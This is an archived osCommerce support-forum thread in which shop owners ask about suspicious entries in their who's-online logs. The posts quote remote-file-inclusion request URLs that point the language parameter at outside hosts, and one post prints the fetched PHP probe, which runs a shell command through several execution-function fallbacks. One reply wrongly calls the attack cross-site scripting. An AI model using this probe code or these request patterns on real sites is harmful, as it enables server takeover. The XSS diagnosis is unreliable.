Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Virus attack that Links language to other site?


Guest

Recommended Posts

Posted

Just found this in my whos online list. How did it get there is it a virus?

 

/index.php?Language=http%3A%2F%2Fbeforethehighway.com%2Fphpmyadm

 

Do not open the link to beforethehighway as it contains a virus. Any ideas on how to remove this or wher it might be found on the site?

  • 6 months later...
Posted

Hi,

 

we have currently a similar problem. When I look into the who's online page, there are often page requests like this

 

 

...shop/index.php?language=http://n2k.xlphp.net/atrix.txt

 

 

The content of the text-file is

 

<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;

function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;

 

 

 

may this be dangerous?

 

 

Martin

Posted

Seems you have been hacked through XSS (cross site scripting). Either you are using an older version of osCommerce which had some vulnerabilities, or you are using one or more contributions which are vulnerable for XSS. It would be a good thing to update to the latest osCommerce version and check your contributions.

 

Maybe the above posters have some contributions in common?

Posted

does an entry in the who-is-online like the above mean that the hack was successful or was it just a try?

 

Is it possible to forward requests with this to any site

 

maybe like

 

if length ($HTTP_GET_VARS['language'] )>2 
redirect(anysite.com)

 

Regards

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...